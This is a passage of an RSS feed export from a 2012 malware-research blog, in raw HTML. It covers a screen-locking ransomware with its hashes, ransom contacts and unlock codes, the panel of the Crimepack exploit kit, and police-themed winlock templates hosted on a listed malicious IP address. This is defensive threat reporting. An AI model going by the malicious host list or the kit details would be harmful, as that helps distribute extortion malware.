kit and traffic on it&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-kL2YP9MxE50/T3JAAUYHioI/AAAAAAAAFpw/ci0YJUfaPOU/s1600/28-03-2012+00-31-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="131" src="http://2.bp.blogspot.com/-kL2YP9MxE50/T3JAAUYHioI/AAAAAAAAFpw/ci0YJUfaPOU/s400/28-03-2012+00-31-24.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;That all... for the moment.&lt;br /&gt;There is alot of things to say on what currently happens, others bloggers and av guys will probably make more constructed posts... wait and see.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-hc_04UI5kR0/T3JCqtatogI/AAAAAAAAFp4/1sqNT3Lj25o/s1600/1331839506590.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="225" src="http://2.bp.blogspot.com/-hc_04UI5kR0/T3JCqtatogI/AAAAAAAAFp4/1sqNT3Lj25o/s400/1331839506590.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-504635188303405249?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/behind-spyeye-gribodemon.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-PTQBOxkz4hM/T3FrBTW0IGI/AAAAAAAAFo4/FHnCJkQekxQ/s72-c/lawsuit.PNG" height="72" width="72" /><thr:total>8</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-277098190529074233</guid><pubDate>Tue, 13 Mar 2012 10:44:00 +0000</pubDate><atom:updated>2012-03-13T11:44:12.491+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">security116</category><category domain="http://www.blogger.com/atom/ns#">+16464816878</category><category domain="http://www.blogger.com/atom/ns#">Ransomware</category><category domain="http://www.blogger.com/atom/ns#">AES</category><category domain="http://www.blogger.com/atom/ns#">0012140809940</category><title>Malware Protection</title><description>&lt;img border="0" src="http://2.bp.blogspot.com/-xCdQjCm27tc/T18kOXcaaBI/AAAAAAAAFoA/qUloGyANqFY/s1600/icons.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;Thanks to &lt;a href="http://www.bleepingcomputer.com/"&gt;Lawrence&lt;/a&gt; for the sample.&lt;br /&gt;This trojan blocker (SHA1: &lt;b style="color: red;"&gt;567953b3562465587d3b1c8360868d0a6bacde73&lt;/b&gt; and &lt;b style="color: red;"&gt;3f7c516fc06f84b806e2ab677442fc1e3d927364&lt;/b&gt; ) prevents  all software execution.&lt;br /&gt;To remove the Trojan (and unlock windows),  infected users need to enter a valid serial number.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/--UYHljDH5gU/T18ghOr86aI/AAAAAAAAFng/Y96bx5EeDXU/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="310" src="http://3.bp.blogspot.com/--UYHljDH5gU/T18ghOr86aI/AAAAAAAAFng/Y96bx5EeDXU/s400/1.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Ref: &lt;b style="color: red;"&gt;0012140809940&lt;/b&gt;&lt;br /&gt;Phone: &lt;b style="color: red;"&gt;+16464816878&lt;/b&gt;&lt;br /&gt;Mail: &lt;b style="color: red;"&gt;security116@gmail.com&lt;/b&gt;&lt;br /&gt;Unlock code: &lt;b style="color: red;"&gt;76557152140071780302280&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-V4M45RDFTBw/T18iuIAfFlI/AAAAAAAAFn4/OTPOL7lnhdc/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="156" src="http://4.bp.blogspot.com/-V4M45RDFTBw/T18iuIAfFlI/AAAAAAAAFn4/OTPOL7lnhdc/s400/4.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;2nd version:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-a3KEOw9s4pU/T18hQMvTWcI/AAAAAAAAFno/NPW2YLH3Ne4/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="313" src="http://1.bp.blogspot.com/-a3KEOw9s4pU/T18hQMvTWcI/AAAAAAAAFno/NPW2YLH3Ne4/s400/2.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Ref: &lt;b style="color: red;"&gt;0012140809940&lt;/b&gt;&lt;br /&gt;Phone: &lt;b style="color: red;"&gt;+16464816878&lt;/b&gt;&lt;br /&gt;Mail: &lt;b style="color: red;"&gt;security116@gmail.com&lt;/b&gt;&lt;br /&gt;Unlock code: &lt;b style="color: red;"&gt;aes987156&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-MbU25piPht8/T18iH9nikqI/AAAAAAAAFnw/mbaWvASuk_g/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="307" src="http://1.bp.blogspot.com/-MbU25piPht8/T18iH9nikqI/AAAAAAAAFnw/mbaWvASuk_g/s320/3.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-277098190529074233?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/malware-protection.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-xCdQjCm27tc/T18kOXcaaBI/AAAAAAAAFoA/qUloGyANqFY/s72-c/icons.PNG" height="72" width="72" /><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-3017909385324375371</guid><pubDate>Sun, 11 Mar 2012 09:01:00 +0000</pubDate><atom:updated>2012-03-11T10:09:24.702+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Crimepack</category><category domain="http://www.blogger.com/atom/ns#">exploit kit</category><title>Crimepack 3.1.3</title><description>Nothing really interesting, just wanna show the (poor) stats of this guys.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-eu_otgOt2eU/T1xpAmmAsUI/AAAAAAAAFm4/AFd0_RcbSrU/s1600/11-03-2012+09-56-46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-eu_otgOt2eU/T1xpAmmAsUI/AAAAAAAAFm4/AFd0_RcbSrU/s400/11-03-2012+09-56-46.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Login:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-5ykGQh6a8fA/T1xoqZy970I/AAAAAAAAFmw/_8xX4T8i7U4/s1600/login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-5ykGQh6a8fA/T1xoqZy970I/AAAAAAAAFmw/_8xX4T8i7U4/s400/login.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Dashboard:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Hyr_8cPD618/T1xoF5-FS-I/AAAAAAAAFl4/FE5b8A9tPqY/s1600/news.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-Hyr_8cPD618/T1xoF5-FS-I/AAAAAAAAFl4/FE5b8A9tPqY/s400/news.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Referrers&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-JT7sXC9IL8o/T1xoK3T3DmI/AAAAAAAAFmA/O0JKHSjY56c/s1600/referrers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-JT7sXC9IL8o/T1xoK3T3DmI/AAAAAAAAFmA/O0JKHSjY56c/s400/referrers.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Countries&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-bxHQKWPyud0/T1xoQF2t77I/AAAAAAAAFmI/ITCZ4m-R47Q/s1600/countries.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-bxHQKWPyud0/T1xoQF2t77I/AAAAAAAAFmI/ITCZ4m-R47Q/s400/countries.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Blacklist checker&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-brgI7i4SZr8/T1xoUeonPgI/AAAAAAAAFmQ/_Zg6TNJ-f08/s1600/blacklist+checker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-brgI7i4SZr8/T1xoUeonPgI/AAAAAAAAFmQ/_Zg6TNJ-f08/s400/blacklist+checker.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Downloader&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-wQ1VesmVxDo/T1xoYtVAaOI/AAAAAAAAFmY/BYgO5y1_L7w/s1600/downloader.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-wQ1VesmVxDo/T1xoYtVAaOI/AAAAAAAAFmY/BYgO5y1_L7w/s400/downloader.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Iframe&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-iTW7MiVMV74/T1xoc9-NxYI/AAAAAAAAFmg/lUrLSKe22cs/s1600/iframe.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-iTW7MiVMV74/T1xoc9-NxYI/AAAAAAAAFmg/lUrLSKe22cs/s400/iframe.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Settings&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-ScTRfcJClb4/T1xog66U3jI/AAAAAAAAFmo/GQTdPsBbbMI/s1600/settings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="243" src="http://4.bp.blogspot.com/-ScTRfcJClb4/T1xog66U3jI/AAAAAAAAFmo/GQTdPsBbbMI/s400/settings.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Who want the kit ?&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-yf9gx6o0hOQ/T1xqsq-bM9I/AAAAAAAAFnA/n19E2fS1JzM/s1600/11-03-2012+10-04-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="170" src="http://2.bp.blogspot.com/-yf9gx6o0hOQ/T1xqsq-bM9I/AAAAAAAAFnA/n19E2fS1JzM/s400/11-03-2012+10-04-05.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Edit: Another domain:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-xp4jey5dFsM/T1xruPw1M5I/AAAAAAAAFnI/hEGQQ5FK6N8/s1600/11-03-2012+10-08-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-xp4jey5dFsM/T1xruPw1M5I/AAAAAAAAFnI/hEGQQ5FK6N8/s400/11-03-2012+10-08-20.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-3017909385324375371?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/crimepack-313.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-eu_otgOt2eU/T1xpAmmAsUI/AAAAAAAAFm4/AFd0_RcbSrU/s72-c/11-03-2012+09-56-46.png" height="72" width="72" /><thr:total>7</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-6583239920331226513</guid><pubDate>Sun, 11 Mar 2012 00:06:00 +0000</pubDate><atom:updated>2012-03-11T10:22:13.958+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">GEMA</category><category domain="http://www.blogger.com/atom/ns#">ukash</category><category domain="http://www.blogger.com/atom/ns#">paysafecard</category><category domain="http://www.blogger.com/atom/ns#">FakePoliceAlert</category><title>GEMA / FakePoliceAlert and money laundering</title><description>Since some days i was back on winlock tracking due to several requests.&lt;br /&gt;Let's show some results.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-EDl_-_DpbnA/T1vbLhUCJ4I/AAAAAAAAFlY/Z1ZGOvKB2Wc/s1600/10-03-2012+23-51-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="341" src="http://1.bp.blogspot.com/-EDl_-_DpbnA/T1vbLhUCJ4I/AAAAAAAAFlY/Z1ZGOvKB2Wc/s400/10-03-2012+23-51-40.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Pwing blackhole kits (sorry no pictures, no kitten) and shit who distribute it&lt;br /&gt;Finally i got multiples interesting IP who host PoliceAlert templates, like this one:&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;http://62.76.190.87/US/&lt;br /&gt;http://62.76.190.87/CA/&lt;br /&gt;http://62.76.190.87/IT/&lt;br /&gt;http://62.76.190.87/DE/&lt;br /&gt;http://62.76.190.87/FR/&lt;br /&gt;http://62.76.190.87/UK/&lt;br /&gt;http://62.76.190.87/ES/&lt;br /&gt;http://62.76.190.87/SE/&lt;br /&gt;http://62.76.190.87/AT/&lt;br /&gt;http://62.76.190.87/FI/&lt;br /&gt;http://62.76.190.87/GR/&lt;br /&gt;http://62.76.190.87/BE/&lt;br /&gt;http://62.76.190.87/PT/&lt;br /&gt;http://62.76.190.87/LU/&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-yqGpjZt8DnQ/T1vTwAOPOxI/AAAAAAAAFjA/YP24dSd2afk/s1600/AT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-yqGpjZt8DnQ/T1vTwAOPOxI/AAAAAAAAFjA/YP24dSd2afk/s400/AT.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-aIhj7Ifl0vs/T1vTyO0852I/AAAAAAAAFjI/dh5HNCggy-g/s1600/BE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-aIhj7Ifl0vs/T1vTyO0852I/AAAAAAAAFjI/dh5HNCggy-g/s400/BE.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-PiMtcGmk1vY/T1vTz8U0GRI/AAAAAAAAFjQ/FSSnqesBE8M/s1600/CA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-PiMtcGmk1vY/T1vTz8U0GRI/AAAAAAAAFjQ/FSSnqesBE8M/s400/CA.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-LpjdyVA4Zl0/T1vT1qj36EI/AAAAAAAAFjY/88NIY2qpJkg/s1600/DE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-LpjdyVA4Zl0/T1vT1qj36EI/AAAAAAAAFjY/88NIY2qpJkg/s400/DE.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-0iWdBb6bhGc/T1vT3PAMwsI/AAAAAAAAFjg/iH5TU4HVsZ4/s1600/ES.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-0iWdBb6bhGc/T1vT3PAMwsI/AAAAAAAAFjg/iH5TU4HVsZ4/s400/ES.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-vyKwaA0iscQ/T1vT4uvDkCI/AAAAAAAAFjo/VJn0-taDuP0/s1600/FI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-vyKwaA0iscQ/T1vT4uvDkCI/AAAAAAAAFjo/VJn0-taDuP0/s400/FI.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-XGkHadrlgo4/T1vT6PTDs8I/AAAAAAAAFjw/nmpJSMmsb4g/s1600/FR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-XGkHadrlgo4/T1vT6PTDs8I/AAAAAAAAFjw/nmpJSMmsb4g/s400/FR.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-pCDG2-4558s/T1vT7_BRVAI/AAAAAAAAFj4/GATGqJAtG_A/s1600/GR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-pCDG2-4558s/T1vT7_BRVAI/AAAAAAAAFj4/GATGqJAtG_A/s400/GR.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-lmXoC1E6kdo/T1vT9gERXJI/AAAAAAAAFkA/tsGBdHtF4FM/s1600/IT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-lmXoC1E6kdo/T1vT9gERXJI/AAAAAAAAFkA/tsGBdHtF4FM/s400/IT.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-PJLu8LZQTBU/T1vT_sxpiGI/AAAAAAAAFkI/VRFWHVu_m90/s1600/PT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-PJLu8LZQTBU/T1vT_sxpiGI/AAAAAAAAFkI/VRFWHVu_m90/s400/PT.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-rZGx7ypLqLA/T1vUBbZeIzI/AAAAAAAAFkQ/WCxfug40qaw/s1600/SE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-rZGx7ypLqLA/T1vUBbZeIzI/AAAAAAAAFkQ/WCxfug40qaw/s400/SE.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-VSBVfGjrsjY/T1vUC4ewL-I/AAAAAAAAFkY/JceLGf65TtM/s1600/UK.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-VSBVfGjrsjY/T1vUC4ewL-I/AAAAAAAAFkY/JceLGf65TtM/s400/UK.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-RQ8ivnnQDQI/T1vUEwW0fSI/AAAAAAAAFkg/GTWnKJkLeQk/s1600/US.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-RQ8ivnnQDQI/T1vUEwW0fSI/AAAAAAAAFkg/GTWnKJkLeQk/s400/US.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-ddokB4wBcq0/T1vUZKIfP5I/AAAAAAAAFko/rOIaW3UiBzY/s1600/LU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-ddokB4wBcq0/T1vUZKIfP5I/AAAAAAAAFko/rOIaW3UiBzY/s400/LU.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Multiple GEMA on another IP:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-8Gb9khE9aD8/T1vZhyKR_oI/AAAAAAAAFlI/TgtH8sxxhmY/s1600/10-03-2012+23-44-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="386" src="http://4.bp.blogspot.com/-8Gb9khE9aD8/T1vZhyKR_oI/AAAAAAAAFlI/TgtH8sxxhmY/s400/10-03-2012+23-44-08.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;PHP inside HTML file... *facepalm*&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-kNX712nXOHs/T1vaGdFDgTI/AAAAAAAAFlQ/BvzQ8GTg8O0/s1600/10-03-2012+23-46-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="82" src="http://4.bp.blogspot.com/-kNX712nXOHs/T1vaGdFDgTI/AAAAAAAAFlQ/BvzQ8GTg8O0/s400/10-03-2012+23-46-26.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Some templates:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-6lPl1WFsJhg/T1vYl14vuNI/AAAAAAAAFkw/iW-ynxXlya4/s1600/GEMADE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="363" src="http://2.bp.blogspot.com/-6lPl1WFsJhg/T1vYl14vuNI/AAAAAAAAFkw/iW-ynxXlya4/s400/GEMADE.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-4BAagv2-u8c/T1vYxSBKNEI/AAAAAAAAFk4/gwyhQ_XxZ8k/s1600/GEMAFR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="363" src="http://4.bp.blogspot.com/-4BAagv2-u8c/T1vYxSBKNEI/AAAAAAAAFk4/gwyhQ_XxZ8k/s400/GEMAFR.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-6vINeu7YI7o/T1vY7k-lU8I/AAAAAAAAFlA/h3_phwDQFRY/s1600/GEMAUK.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="345" src="http://2.bp.blogspot.com/-6vINeu7YI7o/T1vY7k-lU8I/AAAAAAAAFlA/h3_phwDQFRY/s400/GEMAUK.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;'Admin panel':&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-1PxNA2-ests/T1vKgSLXigI/AAAAAAAAFi4/nQZHA5LqCu8/s1600/10-03-2012+22-37-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://3.bp.blogspot.com/-1PxNA2-ests/T1vKgSLXigI/AAAAAAAAFi4/nQZHA5LqCu8/s400/10-03-2012+22-37-23.png" width="361" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Debited PSC found (1985€):&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Wq68N9hHK_c/T1vG8xjIUCI/AAAAAAAAFfI/dfKPI5dFncg/s1600/victim1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://2.bp.blogspot.com/-Wq68N9hHK_c/T1vG8xjIUCI/AAAAAAAAFfI/dfKPI5dFncg/s400/victim1.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-z85l0PnqPtM/T1vG98APJCI/AAAAAAAAFfQ/Al9HIk03KcI/s1600/victim10.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://1.bp.blogspot.com/-z85l0PnqPtM/T1vG98APJCI/AAAAAAAAFfQ/Al9HIk03KcI/s400/victim10.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Xze7WvLpnnQ/T1vG-v7OQ-I/AAAAAAAAFfU/r4Ihl5ObEB8/s1600/victim11.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://1.bp.blogspot.com/-Xze7WvLpnnQ/T1vG-v7OQ-I/AAAAAAAAFfU/r4Ihl5ObEB8/s400/victim11.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-GW70quB6cCM/T1vG_HujUoI/AAAAAAAAFfc/w4DP3DkiybE/s1600/victim12.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://2.bp.blogspot.com/-GW70quB6cCM/T1vG_HujUoI/AAAAAAAAFfc/w4DP3DkiybE/s400/victim12.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-BE98mxtJ_F4/T1vG_y5WAVI/AAAAAAAAFfo/wczn6n86c8U/s1600/victim13.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://2.bp.blogspot.com/-BE98mxtJ_F4/T1vG_y5WAVI/AAAAAAAAFfo/wczn6n86c8U/s400/victim13.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-En5j2f6v9dI/T1vHA0vsvcI/AAAAAAAAFfs/cq_ewgDveIU/s1600/victim14.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-En5j2f6v9dI/T1vHA0vsvcI/AAAAAAAAFfs/cq_ewgDveIU/s400/victim14.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-dInLquA9Qws/T1vHBb1kVrI/AAAAAAAAFf0/HLxfs3Xaqxk/s1600/victim15.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" 